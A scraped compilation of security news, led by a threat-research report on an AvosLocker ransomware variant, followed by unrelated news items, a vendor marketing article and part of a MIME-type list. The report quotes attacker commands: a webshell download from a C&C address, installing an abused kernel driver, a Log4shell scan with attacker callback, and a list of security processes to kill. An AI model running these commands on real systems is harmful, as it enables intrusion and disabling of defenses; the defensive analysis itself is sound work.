AvosLocker Ransomware Variant Abuses Driver File to Disable Anti-Virus, Scans for Log4shell

We found samples of AvosLocker ransomware that makes use of a legitimate driver file to disable anti-virus solutions and detection evasion. While previous AvosLocker infections employ similar routines, this is the first sample we observed from the US with the capability to disable a defense solution using a legitimate Avast Anti-Rootkit Driver file (asWarPot.sys).  In addition, the ransomware is also capable of scanning multiple endpoints for the Log4j vulnerability Log4shell using Nmap NSE script.

Infection chain

fig1-avoslocker-ransomware-disables-av-scans-log4shell
Figure 1. AvosLocker infection chain

According to our analysis, the suspected entry point is via the Zoho ManageEngine ADSelfService Plus (ADSS) exploit:

fig2-avoslocker-ransomware-disables-av-scans-log4shell
Figure 2. The ADSS exploit abusing CVE-2021-40539

Due to the lack of network traffic details, we could not identify the exact CVE ID of the security gap the attacker used. However, there are some indications that they abused the same vulnerability previously documented by Synacktiv during a pentest, CVE-2021-40539. The gap we observed was particularly similar to the creation of JSP files (test.jsp), execution of keytool.exe with “null” parameters to run a crafted Java class/code.

Mapping the infection

The ADSS JAVA component (C:\ManageEngine\ADSelfService Plus\jre\bin\java.exe) executed mshta.exe to remotely run a remotely-hosted HTML application (HTA) file from the attackers’ command and control (C&C) server. Using Trend Micro™ Vision One™, we mapped out the processes that the infection performed to spawn the process. 

fig3-avoslocker-ransomware-disables-av-scans-log4shell
Figure 3. Remotely executing an HTA file from the C&C server. Screenshots taken from Trend Micro Vison One.
fig4-avoslocker-ransomware-disables-av-scans-log4shell
Figure 4. HTA file connecting to the C&C

A closer look at the HTA file revealed that the mshta.exe downloads and executes the remotely hosted HTA file. The HTA executed an obfuscated PowerShell script that contains a shellcode, capable of connecting back to the C&C server to execute arbitrary commands.

fig5-avoslocker-ransomware-disables-av-scans-log4shell
Figure 5. Obfuscated PowerShell script contains a shellcode

The PowerShell process will download an ASPX webshell from the C&C server using the command < cmd.exe /c powershell -command Invoke-WebRequest -Uri hxxp://xx.xx.xx.xx/subshell.aspx -OutFile /ManageEngine/ADSelfService Plus/webapps/adssp/help/admin-guide >. According to Synacktiv’s research, with this command, the downloaded ASPX webshell is downloaded from a remote IP address and saved to the directory, and still accessible to the attacker. The attackers gathered system information using available tools such as whoami and systeminfo, as well as PowerShell commands.

fig6-avoslocker-ransomware-disables-av-scans-log4shell
Figure 6. Gather system information

The code executes on the current domain controller to gather the username information, while the query user information gathers data about user sessions on a Remote Desktop Session Host server, name of the user, session ID, state of the session (either active or disconnected), idle time, date, and time the user logged on.

fig7-avoslocker-ransomware-disables-av-scans-log4shell
Figure 7. Executed with the /domain argument to collect username information
fig8-avoslocker-ransomware-disables-av-scans-log4shell
Figure 8. query user information for session data

The PowerShell downloads, installs, and allows the remote desktop tool AnyDeskMSI through the firewall.

fig9-avoslocker-ransomware-disables-av-scans-log4shell
Figure 9. The PowerShell downloading and installing AnyDeskMSI

We observed that a new user account was created, added to the current domain, and included in the administrator group. This ensures the attacker can have administrative rights to the infected system. The attackers also checked the running processes in the system via TaskList to check for anti-virus processes running in the infiltrated system.

fig10-avoslocker-ransomware-disables-av-scans-log4shell
Figure 10. Creating a new account with admin rights
fig11-avoslocker-ransomware-disables-av-scans-log4shell
Figure 11. Checking for anti-virus processes running

During the scan, we observed an attempt to terminate security products initiated via TaskKill. Testing the sample with Trend Micro Vision One, the attempt failed as its sensors were still able to send activity data to the platform.

fig12-avoslocker-ransomware-disables-av-scans-log4shell
Figure 12. Terminating security products running

Tools and functions

Additional tools and components were copied to the compromised machine using AnyDeskMSI to scan the local network and disable security products. The tools transferred using AnyDesk are:

  • Netscan: To scan for other endpoints
  • Nmap (log4shell.nse): To scan for Log4shell vulnerable endpoints
  • Hacking tools Mimikatz and Impacket: For lateral movement
  • PDQ deploy: For mass deployment of malicious script to multiple endpoints
  • Aswarpot.sys: For disabling defense solutions. We noted that it can disable a number of anti-virus products, previously identified by Aon’s researchers.
fig13-avoslocker-ransomware-disables-av-scans-log4shell
Figure 13. Copying tools and other malicious components to the compromised machine using AnyDesk

We found an Avast anti-rootkit driver installed as service ‘asWarPot.sys’ using the command sc.exe  create aswSP_ArPot2 binPath= C:\windows\aswArPot.sys type= kernel. It installs the driver file in preparation for disabling the running anti-virus product. We noted the unusual use of cmd.exe for execution of the file.  

fig14-avoslocker-ransomware-disables-av-scans-log4shell
Figure 14. Executing the anti-rootkit driver in the system

Mimikatz components were also copied to the affected machine via AnyDeskMSI. However, these components were detected and deleted.

fig15-avoslocker-ransomware-disables-av-scans-log4shell
Figure 15. Detecting and deleting Mimikatz

We observed the PowerShell script disabling the security products by leveraging aswarpot.sys (a legitimate Avast Anti-Rootkit Driver). A list of security product processes was supplied and subsequently terminated by the driver.

fig16-avoslocker-ransomware-disables-av-scans-log4shell
Figure 16. Listing and terminating the security products found running in the compromised system

Verification: Manual replication of anti-virus disabling routine

We manually replicated the routine and commands for disabling the defense solutions to further look into the routine. Figure 17 shows the list of processes that the routine searches on infection :

  • EndpointBasecamp.exe
  • Trend Micro Endpoint Basecamp
  • ResponseService.exe
  • PccNTMon.exe
  • SupportConnector.exe
  • AOTAgent.exe
  • CETASvc.exe
  • CETASvc
  • iVPAgent.exe
  • tmwscsvc.exe
  • TMResponse
  • AOTAgentSvc
  • TMBMServer
  • iVPAgent
  • Trend Micro Web Service Communicator
  • Tmccsf
  • Tmlisten
  • Ntrtscan
  • TmWSCSvc
fig17-avoslocker-ransomware-disables-av-scans-log4shell
Figure 17. Searching for processes

We found that aswArPot.sys, registered as aswSP_ArPot2 as a service, is used as the handle for the following DeviceIoControl call.

fig18-avoslocker-ransomware-disables-av-scans-log4shell
Figure 18. Driver file preparing to disable an anti-virus product

The DeviceIoControl function is used to execute parts of the driver. In this case, the DeviceIoControl is inside a loop that iterates through the list of processes mentioned above. Additionally, we can see that 0x9988C094 is passed to DeviceIoControl as an argument simultaneous to the ID of the current process in the iteration.

fig19-avoslocker-ransomware-disables-av-scans-log4shell
Figure 19. DeviceIoControl as an argument with the current process ID

Inside aswArPot.sys, we saw 0x9988C094 in a switch case with a function sub_14001DC80 case. Inside function sub_14001DC80, we can see that that function has the capability to terminate a given process.

fig20-avoslocker-ransomware-disables-av-scans-log4shell
Figure 20. 0x9988C094 in a switch case with sub_14001DC80 (above), with the latter value terminating a process (below).

Other executions and lateral movement

After disabling the security products, the actors behind AvosLocker again tried to transfer other tools, namely Mimikatz and Impacket.

fig21-avoslocker-ransomware-disables-av-scans-log4shell
Figure 21. Execution of Mimikatz (above) and Impacket via C:\temp\wmiexec.exe (below)

We also observed the execution of a password recovery tool XenArmor with C:\temp\pass\start.exe.

fig22-avoslocker-ransomware-disables-av-scans-log4shell
Figure 22. XenArmor password recovery tool execution

We observed the attackers using an NMAP script to check for Log4shell, the Apache Log4j remote code execution (RCE, with ID CVE-2021-44228) vulnerability across the network. They used the command nmap  –script log4shell.nse –script-args log4shell.waf-bypass=true –script-args log4shell.callback-server=xx.xx.xx.xx:1389 -p 80,443 xx.xx.xx.xx/xx, and set the callback server to the attacker group C&C server. 

fig23-avoslocker-ransomware-disables-av-scans-log4shell
Figure 23. Checking for log4shell

We also observed more system network configuration discovery techniques being run, possibly for lateral movement as it tried looking for other available endpoints.

fig24-avoslocker-ransomware-disables-av-scans-log4shell
Figure 24. Running more system network configuration discovery scans

Deploying across the network

We saw software deployment tool PDQ being used to deploy malicious batch scripts to multiple endpoints in the network.

fig25-avoslocker-ransomware-disables-av-scans-log4shell
Figure 25. Deploying malicious batch scripts to other endpoints

The deployed batch script has the following commands:

  • Disable Windows Update and Microsoft Defender
fig26-avoslocker-ransomware-disables-av-scans-log4shell
Figure 26. Disable Microsoft defense services
  • Prevents safeboot execution of security products
fig27-avoslocker-ransomware-disables-av-scans-log4shell
Figure 27. Prevent security products’ execution
  • Create new administrator account
fig28-avoslocker-ransomware-disables-av-scans-log4shell
Figure 28. Create new account
  • Add the AutoStart mechanism for the AvosLocker executable (update.exe)
fig29-avoslocker-ransomware-disables-av-scans-log4shell
Figure 29. Add Autostart for ransomware executable
  • Disables legal notice caption
fig30-avoslocker-ransomware-disables-av-scans-log4shell
Figure 30. Disable legal notice
  • Set safeboot with networking and disables Windows Error Recovery and reboot
fig31-avoslocker-ransomware-disables-av-scans-log4shell
Figure 31. Setting and disabling network and specific Windows functions

Conclusion

While AvosLocker has been documented for its abuse of AnyDesk for lateral movement as its preferred application, we note that other remote access applications can also be abused to replace it. We think the same can be said for the software deployment tool, wherein the malicious actors can subsequently decide to replace and abuse it with other commercially available ones. In addition, aside from its availability, the decision to choose the specific rootkit driver file is for its capability to execute in kernel mode (therefore operating at a high privilege).

This variant is also capable of modifying other details of the installed security solutions, such as disabling the legal notice. Other modern ransomware, such as Mespinoza/Pysa, modify the registries of infected systems during their respective routines to inform their victims that they have been compromised.

Similar to previously documented malware and ransomware groups, AvosLocker takes advantage of the different vulnerabilities that have yet to be patched to get into organizations’ networks. Once inside, the continuing trend of abusing legitimate tools and functions to mask malicious activities and actors’ presence grows in sophistication. In this case, the attackers were able to study and use Avast’s driver as part of their arsenal to disable other vendors’ security products.

However, and specific to this instance, the attempt to kill an anti-virus product such as this variant’s TaskKill can also be foiled. In this example using Trend Micro Vision One, the attempt was unsuccessful likely due to the product’s self-protection feature, which allowed the sensors to continue sending data and block the noted routine. The visibility enabled by the platform allowed us as researchers to capture the extent of this ransomware’s attack chain and replicate the driver file being abused to verify its function during compromise.

Avast responded to our notification with this statement:

“We can confirm the vulnerability in an old version of our driver aswArPot.sys, which we fixed in our Avast 21.5 released in June 2021. We also worked closely with Microsoft, so they released a block in the Windows operating system (10 and 11), so the old version of the Avast driver can’t be loaded to memory.

The below example shows that the blocking works (output from the “sc start” command):

               (SC) StartService FAILED 1275:

               This driver has been blocked from loading

The update from Microsoft for the Windows operating system was published in February as an optional update, and in Microsoft’s security release in April, so fully updated machines running Windows 10 and 11 are not vulnerable to this kind of attack.

All consumer and business antivirus versions of Avast and AVG detect and block this AvosLocker ransomware variant, so our users are protected from this attack vector.

For users of third-party antivirus software, to stay protected against this vulnerability, we recommend users to update their Windows operating system with the latest security updates, and to use a fully updated antivirus program.”

Indicators of Compromise (IOCs) 

FileSHA256Detection
Malicious batch file componenta5ad3355f55e1a15baefea83ce81d038531af516f47716018b1dedf04f081f15Trojan.BAT.KILLAV.YACAA
AvosLocker executable05ba2df0033e3cd5b987d66b6de545df439d338a20165c0ba96cde8a74e463e5Ransom.Win32.AVOSLOCKER.SMYXBLNT
Mimikatz executable (x32 and x64)912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9HackTool.Win64.MIMIKATZ.ZTJA
e81a8f8ad804c4d83869d7806a303ff04f31cce376c5df8aada2e9db2c1eeb98HackTool.Win32.Mimikatz.CNFW
Log4shell Nmap NSE scriptddcb0e99f27e79d3536a15e0d51f7f33c38b2ae48677570f36f5e92863db5a96Backdoor.Win32.CVE202144228.YACAH
Impacket tool14f0c4ce32821a7d25ea5e016ea26067d6615e3336c3baa854ea37a290a462a8HackTool.Win32.Impacket.AA

Source :
https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html

NIST Releases Updated Cybersecurity Guidance for Managing Supply Chain Risks

The National Institute of Standards and Technology (NIST) on Thursday released an updated cybersecurity guidance for managing risks in the supply chain, as it increasingly emerges as a lucrative attack vector.

“It encourages organizations to consider the vulnerabilities not only of a finished product they are considering using, but also of its components — which may have been developed elsewhere — and the journey those components took to reach their destination,” NIST said in a statement.

The new directive outlines major security controls and practices that entities should adopt to identify, assess, and respond to risks at different stages of the supply chain, including the possibility of malicious functionality, flaws in third-party software, insertion of counterfeit hardware, and poor manufacturing and development practices.

Software Supply Chain Risks

The development follows an Executive Order issued by the U.S. President on “Improving the Nation’s Cybersecurity (14028)” last May, requiring government agencies to take steps to “improve the security and integrity of the software supply chain, with a priority on addressing critical software.”

Supply Chain Risks

It also comes as cybersecurity risks in the supply chain have come to the forefront in recent years, in part compounded by a wave of attacks targeting widely-used software to breach dozens of downstream vendors all at once.

According to the European Union Agency for Cybersecurity’s (ENISA) Threat Landscape for Supply Chain Attacks, 62% of 24 attacks documented from January 2020 to early 2021 were found to “exploit the trust of customers in their supplier.”

“Managing the cybersecurity of the supply chain is a need that is here to stay,” said NIST’s Jon Boyens and one of the publication’s authors. “If your agency or organization hasn’t started on it, this is a comprehensive tool that can take you from crawl to walk to run, and it can help you do so immediately.”

Source :
https://thehackernews.com/2022/05/nist-releases-updated-guidance-for.html

Researchers Disclose Years-Old Vulnerabilities in Avast and AVG Antivirus

Two high-severity security vulnerabilities, which went undetected for several years, have been discovered in a legitimate driver that’s part of Avast and AVG antivirus solutions.

“These vulnerabilities allow attackers to escalate privileges enabling them to disable security products, overwrite system components, corrupt the operating system, or perform malicious operations unimpeded,” SentinelOne researcher Kasif Dekel said in a report shared with The Hacker News.

Tracked as CVE-2022-26522 and CVE-2022-26523, the flaws reside in a legitimate anti-rootkit kernel driver named aswArPot.sys and are said to have been introduced in Avast version 12.1, which was released in June 2016.

Specifically, the shortcomings are rooted in a socket connection handler in the kernel driver that could lead to privilege escalation by running code in the kernel from a non-administrator user, potentially causing the operating system to crash and display a blue screen of death (BSoD) error.

Vulnerabilities in Avast and AVG Antivirus

Worryingly, the flaws could also be exploited as part of a second-stage browser attack or to perform a sandbox escape, leading to far-reaching consequences.

Following responsible disclosure on December 20, 2021, Avast addressed the issues in version 22.1 of the software released on February 8, 2022. “Rootkit driver BSoD was fixed,” the company said in its release notes.

While there is no evidence that these flaws were abused in the wild, the disclosure comes merely days after Trend Micro detailed an AvosLocker ransomware attack that leveraged another issue in the same driver to terminate antivirus solutions on the compromised system.

Update: SentinelOne notes that the bug dates back to version 12.1, which it claims was released in January 2012. However, Avast’s own release notes show that version 12.1 was shipped in June 2016. We have reached out to SentinelOne for further comment, and we’ll update the story once we hear back.

Source :
https://thehackernews.com/2022/05/researchers-disclose-10-year-old.html

Chinese Hackers Caught Stealing Intellectual Property from Multinational Companies

An elusive and sophisticated cyberespionage campaign orchestrated by the China-backed Winnti group has managed to fly under the radar since at least 2019.

Dubbed “Operation CuckooBees” by Israeli cybersecurity company Cybereason, the massive intellectual property theft operation enabled the threat actor to exfiltrate hundreds of gigabytes of information.

Targets included technology and manufacturing companies primarily located in East Asia, Western Europe, and North America.

“The attackers targeted intellectual property developed by the victims, including sensitive documents, blueprints, diagrams, formulas, and manufacturing-related proprietary data,” the researchers said.

“In addition, the attackers collected information that could be used for future cyberattacks, such as details about the target company’s business units, network architecture, user accounts and credentials, employee emails, and customer data.”

Winnti, also tracked by other cybersecurity vendors under the names APT41, Axiom, Barium, and Bronze Atlas, is known to be active since at least 2007.

“The group’s intent is towards theft of intellectual property from organizations in developed economies, and with moderate confidence that this is on behalf of China to support decision making in a range of Chinese economic sectors,” Secureworks notes in a threat profile of the actor.

The multi-phased infection chain documented by Cybereason involves the exploitation of internet-facing servers to deploy a web shell with the goal of conducting reconnaissance, lateral movement, and data exfiltration activities.

It’s both complex and intricate, following a “house of cards” approach in that each component of the killchain depends on other modules in order to function, rendering analysis exceedingly difficult.

Chinese Hackers

“This demonstrates the thought and effort that was put into both the malware and operational security considerations, making it almost impossible to analyze unless all pieces of the puzzle are assembled in the correct order,” the researchers explained.

The data harvesting is facilitated by means of a modular loader called Spyder, which is used to decrypt and load additional payloads. Also used are four different payloads — STASHLOG, SPARKLOG, PRIVATELOG, and DEPLOYLOG — that are sequentially deployed to drop the WINNKIT, a kernel-level rootkit.

Crucial to the stealthiness of the campaign is the use of “rarely seen” techniques such as the abuse of Windows Common Log File System (CLFS) mechanism to stash the payloads, enabling the hacking group to conceal their payloads and evade detection by traditional security products.

Interestingly, parts of the attack sequence were previously detailed by Mandiant in September 2021, while pointing out the misuse of CLFS to hide second-stage payloads in an attempt to circumvent detection.

The cybersecurity firm attributed the malware to an unknown actor, but cautioned that it could have been deployed as part of a highly targeted activity.

“Because the file format is not widely used or documented, there are no available tools that can parse CLFS log files,” Mandiant said at the time. “This provides attackers with an opportunity to hide their data as log records in a convenient way, because these are accessible through API functions.”

WINNKIT, for its part, has a compilation timestamp of May 2019 and has almost zero detection rate in VirusTotal, highlighting the evasive nature of the malware that enabled the authors to stay undiscovered for years.

The ultimate goal of the intrusions, the researchers assessed, is to siphon proprietary information, research documents, source code, and blueprints for various technologies.

“Winnti is one of the most industrious groups operating on behalf of Chinese state-aligned interests,” Cybereason said. “The threat [actor] employed an elaborate, multi-stage infection chain that was critical to enabling the group to remain undetected for so long.”

Source :
https://thehackernews.com/2022/05/chinese-hackers-caught-stealing.html

Google Releases First Developer Preview of Privacy Sandbox on Android 13

Google has officially released the first developer preview for the Privacy Sandbox on Android 13, offering an “early look” at the SDK Runtime and Topics API to boost users’ privacy online.

“The Privacy Sandbox on Android Developer Preview program will run over the course of 2022, with a beta release planned by the end of the year,” the search giant said in an overview.

A “multi-year effort,” Privacy Sandbox on Android aims to create technologies that’s both privacy-preserving as well as keep online content and services free without having to resort to opaque methods of digital advertising.

The idea is to limit sharing of user data with third-parties and operate without cross-app identifiers, including advertising ID, a unique, user-resettable string of letters and digits that can be used to track users as they move between apps.

Google originally announced its plans to bring Privacy Sandbox to Android earlier this February, following the footsteps of Apple’s App Tracking Transparency (ATT) framework.

Integral to the proposed initiative are two key solutions —

  • SDK Runtime, which runs third-party code in mobile apps such as software development kits (SDKs), including those for ads and analytics, in a dedicated sandbox, and
  • Topics API, which gleans “coarse-grained” interest signals on-device based on a user’s app usage that are then shared with advertisers to serve tailored ads without cross-site and cross-app tracking

To address criticisms that the model could possibly give Google an unfair advantage, the tech behemoth noted that the privacy-oriented systems will be developed as part of the Android Open Source Project (AOSP) to ensure transparency into the design and implementation of these solutions.

“Android will collaborate with the entire industry and app ecosystem on the journey to a more privacy-first mobile platform, and one which supports a rich diversity of value-exchange that benefits users, developers, and advertisers,” the company said.

Source :
https://thehackernews.com/2022/05/google-releases-first-developer-preview.html

Trend Micro Apex One triggers false positive with Microsoft Edge 101.0.1210.32

A quick note for administrators and users who use the Trend Micro Apex One product and at the same time use Microsoft Edge as a browser under Windows. I have now received numerous reports on the blog that Trend Micro Apex One is classifying the msedge_200_percent.pak file from Edge 101.0.1210.32 as malware/trojan. This is a false positive.



Microsoft Edge 101.0.1210.32

Microsoft  has updated the Chromium Edge browser to version Edge 101.0.1210.32 as of April 28, 2022. This is a maintenance update that closes the two vulnerabilities CVE-2022-29146(privilege elevation) and CVE-2022-29147 (information retrieval) (see also the release notes for the new version). In addition, a number of CVEs that have already been fixed in Google Chrome have also been included in the Edge update. I had reported on this in the blog post Microsoft Edge 101.0.1210.32.

hat zum 28. April 2022 den Chromium-Edge Browser auf die Version Edge 101.0.1210.32 aktualisiert. Es handelt sich um ein Wartungsupdate, das die beiden Schwachstellen  (Privilegienerhöhung) und  (Abrufen von Informationen) schließt (siehe auch die Release Notes-Seite zur neuen Version). Zudem wurden eine Reihe CVEs, die bereits im Google Chrome gefixt wurden, auch im Edge-Update berücksichtigt. Ich hatte im Blog-Beitrag Microsoft Edge 101.0.1210.32 Sicherheitsupdate darüber berichtet.

Trend Micro Apex One false positive alarm

Since today, May 3, 2022, I’ve been getting more and more feedback from administrators on my blog about Trend Micro’s Apex One security solution raising a false alarm and supposedly detecting a Trojan. The first German comment here already describes the situation:

The update causes a false positive on Trend Micro Apex One!

All of our client agents are currently alerting on the automatic update, pointing to the following file:

C:\Program Files (x86)\Microsoft\Edge\Application\101.0.1210.32\msedge_200_percent.pak

Virus/Malware: TROJ_FRS.VSNTE222
Virus/Malware: TSC_GENCLEAN

We are currently analyzing the incident and therefore we cannot give exact information about it yet.

The whole thing is confirmed by other administrators. The file msedge_200_percent.pak from Edge 101.0.1210.32 is reported as
“TROJ_FRS.VSNTE222”. Reader Thomas uploaded the file to Virustotal. Only Trend Micro recognizes it as a virus. Peter L. reports here that also the registry entry:

HKEY_USERS\$SID\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoChangingWallpaper

ris changed. Based on what is known so far, this is likely to be a false positive.


Advertising


Forum thread at Trend Micro

Since a few minutes there is also this thread at Trend Micro in the forum, where a user also complains about this false alarm in Edge.  

we are getting this message from every client since several minutes.
Is it a false positiv error or do we have a real trojaner problem ?

Virus/Malware: TROJ_FRS.VSNTE222

Endpoint: W10NBSV066

Domain: xxxxx\Workstations\Group5\

File: C:\Program Files (x86)\Microsoft\Edge\Application\101.0.1210.32\msedge_200_percent.pak

Date/Time: 5/3/2022 11:17:51

Result: Action required – Apex One detect

The whole thing is also confirmed by numerous users there. One user there confirmed that the malware team was informed about the false alarm and was working on an update.

Hi Team,

Our Malware Team are already aware of these False Alarms and is currently checking the issue. Will provide an update once we receive new feedbacks.

Best regards,

Paulo Obrero

Customer Service Engineer

Trend Micro Inc.

All that remains is to wait until the update arrives – and in the meantime to declare the file in question as an exception.

Source :
https://borncity.com/win/2022/05/03/trend-micro-apex-one-lst-fehlalarm-beim-microsoft-edge-101-0-1210-32-aus/

Microsoft Azure Vulnerability Exposes PostgreSQL Databases to Other Customers

Microsoft on Thursday disclosed that it addressed a pair of issues with the Azure Database for PostgreSQL Flexible Server that could result in unauthorized cross-account database access in a region.

“By exploiting an elevated permissions bug in the Flexible Server authentication process for a replication user, a malicious user could leverage an improperly anchored regular expression to bypass authentication to gain access to other customers’ databases,” Microsoft Security Response Center (MSRC) said.

New York City-based cloud security company Wiz, which uncovered the flaws, dubbed the exploit chain “ExtraReplica.” Microsoft said it mitigated the bug within 48 hours of disclosure on January 13, 2022.

Specifically, it relates to a case of privilege escalation in the Azure PostgreSQL engine to gain code execution and a cross-account authentication bypass by means of a forged certificate, allowing an attacker to create a database in the target’s Azure region and exfiltrate sensitive information.

In other words, successful exploitation of the critical flaws could have enabled an adversary to gain unauthorized read access to other customers’ PostgreSQL databases, effectively circumventing tenant isolation.

Wiz traced the privilege escalation to a bug stemming as a result of modifications introduced in the PostgreSQL engine to harden its privilege model and add new features. The name ExtraReplica comes from the fact that the exploit leverages a PostgreSQL feature that permits copying database data from one server to another, i.e., “replicating” the database.

The Windows maker described the security vulnerability as affecting PostgreSQL Flexible Server instances deployed using the public access networking option, but stressed that it did not find evidence of the flaw being actively exploited and that no customer data was accessed.

“No action is required by customers,” MSRC said. “In order to further minimize exposure, we recommend that customers enable private network access when setting up their Flexible Server instances.”

Source :
https://thehackernews.com/2022/04/microsoft-azure-vulnerability-exposes.html

Everything you need to know to create a Vulnerability Assessment Report

You’ve been asked for a Vulnerability Assessment Report for your organisation and for some of you reading this article, your first thought is likely to be “What is that?”

Worry not. This article will answer that very question as well as why you need a Vulnerability Assessment Report and where you can get one from.

As it’s likely the request for such a report came from an important source such as the Board, a partner, a client or an auditor, there isn’t a moment to waste. So let’s drive straight in.

What is a Vulnerability Assessment Report and why do you need one?

A Vulnerability Assessment Report is simply a document that illustrates how you are managing your organisation’s vulnerabilities. It’s important because, with tens of thousands of new technology flaws being discovered every year, you need to be able to prove that your organisation does its best to avoid attack if you want to be trusted by partners and customers.

A best security practice recommended by governments across the world, a vulnerability assessment is an automated review process that provides insights into your current security state. The vulnerability assessment report is the outcome of this review. Used as a roadmap to a better state of security preparedness, it lays out the unique risks your organisation is up against due to the technology you use, and reveals how best to overcome them with minimal disruption to your core business strategy and operations.

The help it provides is clear but why do you need one? As mentioned above, it’s likely you were asked for a Vulnerability Assessment Report by the Board, a partner, a client or an auditor as each of these groups needs reassurance that you’re on top of any weaknesses in your infrastructure. Here’s why:

— Customers need to trust you

Weaknesses in your IT systems could affect your customers’ operations. With supply chain attacks on the rise, a vulnerability in a single company could leave the whole range of organizations paralysed, as demonstrated by the infamous SolarWinds hack last year.

It doesn’t matter how small your business is; if your customers will be entrusting you with any of their data, they may wish for a Vulnerability Assessment Report first to confirm that your IT security practices are tiptop.

— The Board wants a better understanding of the business’ risk

Cyber security is a growing concern across many businesses, so chances are your board members want to take a better grip of their risk, before the lack of insights into vulnerabilities is turned into a much more serious business problem. With ransomware attacks regularly making headlines, having proper vulnerability management in place and presenting an “all clear” report, can give your business heads that needed peace of mind.

— Your auditors are checking for compliance

Many of the regulatory or compliance frameworks related to security and privacy, like SOC2, HIPAA, GDPR, ISO 27001, and PCI DSS, advise or outright require regular compliance scans and reporting, so if the request for a vulnerability assessment report was made by your auditor, it is likely to be for compliance purposes.

— Your CFO is renewing your cyber insurance

It could be the case that your insurance provider is seeking a vulnerability assessment report as part of the underwriting process. If you don’t want to run the risk of being denied your insurance payment or wouldn’t like to see your premiums rise, then you could benefit from supplying these reports regularly.

How often do you need to produce a vulnerability assessment report?

Regularly. Think of it like vulnerability scanning: For maximum efficacy, you need to conduct regular, if not constant, comprehensive evaluations of your entire technology stack, otherwise you could miss something that could bring your business to a costly halt.

Cybercriminals do not stop searching until they find something they can take advantage of. You need to scan your systems continuously and have up to date reporting to reflect your vigilance as and when it’s needed.

Modern vulnerability scanning solutions, like Intruder, will give you a cyber hygiene score which enables you to track the progress of your vulnerability management efforts over time, proving that your security issues are being continuously resolved in good time.‍

A vulnerability assessment report from Intruder, to provide evidence to your customers or regulators that a vulnerability scanning process is in place.

What should be included in a vulnerability assessment report?

Unfortunately, there isn’t a one size fits all report. While the contents are generally the number of vulnerabilities detected in your systems at a point in time, your different stakeholders will require varying levels of detail. Even for compliance purposes, vulnerability assessment reporting requirements can differ.

As a good rule of thumb, we recommend building an Executive Report containing graph views and composite cyber hygiene scores for the Board and C-Suite that clue them in on where they stand at any given moment. And for your IT team, their report needs greater detail such as how to apply the correct solutions to existing problems and sidestep subsequent mistakes.

Where can you get a Vulnerability Assessment Report from?

Ensuring your Vulnerability Assessment Reports contain all the elements and information your stakeholders require can take a lot of work and expertise; which can distract your security teams from other activities that will keep your organisation secure. That is why it’s recommended to choose an external provider to produce your reports.

Before you start comparing individual vendors, make sure you have a solid understanding of your technical environment and of the specific outcomes that the vulnerability assessment should present. This is because vulnerability assessment tools are not built the same; they check for different types of weaknesses, so you need to choose the solution that best suits your requirements. Consider the features and checks you’ll require, as well as the industry standards you need to follow and your budget.

Two key elements to consider relate to reporting: firstly, how flexible the assessment provider will be with how much detail is presented (particularly if you need to present data to different audiences); and secondly, how clearly the results are communicated. Scanning results can be overwhelming but the right vendor will demystify complex security data to grant you a clear, jargon-free understanding of the risks you face.

At Intruder, reports are designed to be well-understood, whilst also maintaining all the technical detail required by IT managers and DevOps teams. Whether you’re a massive enterprise or a fledgling startup, you can generate rapid reports, create compliance paper trails, stay secure, and communicate with employees and potential investors. Intruder offers a free trial of its software, which you can activate here. Get vulnerability assessment reporting in place now.

Source :
https://thehackernews.com/2022/04/everything-you-need-to-know-to-create.html

All known MIME types

There are 2343 known MIME types.

application/x-shockwave-flash2-previewMacromedia Flash SWF File Format, Version 7 fdd
Macromedia Flash SWF File Format, Version 8 fdd
audio/module-xmModule Music Formats (Mods) fdd
audio/rmfAIFF (Audio Interchange File Format) fdd
audio/vnd.qcelpAIFF (Audio Interchange File Format) fdd
audio/x-gsmAIFF (Audio Interchange File Format) fdd
audio/x-midiAIFF (Audio Interchange File Format) fdd
audio/x-modModule Music Formats (Mods) fdd
audio/x-pn-aiffAIFF (Audio Interchange File Format) fdd
AIFF File Format with LPCM Audio fdd
audio/x-rmfAIFF (Audio Interchange File Format) fdd
sound/aiffAIFF (Audio Interchange File Format) fdd
AIFF File Format with LPCM Audio fdd
video/mp1sMPEG-2 Video Encoding (H.262) fdd
MPEG-2 Encoding Family fdd
video/mp2pMPEG-2 Video Encoding (H.262) fdd
MPEG-2 Encoding Family fdd
3d/vnd.adobe.dn+dcxAdobe Dimension ffw
application-x/geogebra-fileGgb ffw
application/acadDWG ffw
AutoCad Drawing tika
application/acrobatPDF (Portable Document Format) Family fdd
application/activemessageapplication/activemessage tika
application/andrew-insetapplication/andrew-inset tika
application/applefileAppleSingle ffw
application/applefile tika
—  application/applefile; version=”1″AppleSingle 1 pronom
—  application/applefile; version=”2″AppleSingle 2 pronom
application/applixwareapplication/applixware tika
application/atom+xmlAtom ffw
application/atom+xml tika
application/atomcat+xmlapplication/atomcat+xml tika
application/atomicmailapplication/atomicmail tika
application/atomsvc+xmlapplication/atomsvc+xml tika
application/auth-policy+xmlapplication/auth-policy+xml tika
application/autocad_dwgDWG ffw
AutoCad Drawing tika
application/batch-smtpapplication/batch-smtp tika
application/beep+xmlapplication/beep+xml tika
application/binhexBinHex ffw
application/mac-binhex40 tika
application/cals-1840application/cals-1840 tika
application/cborConcise Binary Object Representation container tika
application/ccxml+xmlapplication/ccxml+xml tika
application/cea-2018+xmlapplication/cea-2018+xml tika
application/cellml+xmlapplication/cellml+xml tika
application/cnrp+xmlapplication/cnrp+xml tika
application/commongroundapplication/commonground tika
application/conference-info+xmlapplication/conference-info+xml tika
application/cpl+xmlapplication/cpl+xml tika
application/csta+xmlapplication/csta+xml tika
application/cstadata+xmlapplication/cstadata+xml tika
application/csvCSV ffw
application/cu-seemeapplication/cu-seeme tika
application/cybercashapplication/cybercash tika
application/dartDart githublinguist
application/davmount+xmlapplication/davmount+xml tika
application/dbaseMapInfo Data File (DAT) fdd
dBASE Table File Format (DBF) fdd
dBASE Table for ESRI Shapefile (DBF) fdd
—  application/dbase; version=”iv”dBASE Database IV pronom
application/dbfMapInfo Data File (DAT) fdd
dBASE Table File Format (DBF) fdd
dBASE Table for ESRI Shapefile (DBF) fdd
application/dca-rftapplication/dca-rft tika
application/dec-dxapplication/dec-dx tika
application/dec-dx.DEC Data Exchange File pronom
application/dialog-info+xmlapplication/dialog-info+xml tika
application/dicomDICOM ffw
DICOM medical imaging data tika
Digital Imaging and Communications in Medicine File Format pronom
application/dnsapplication/dns tika
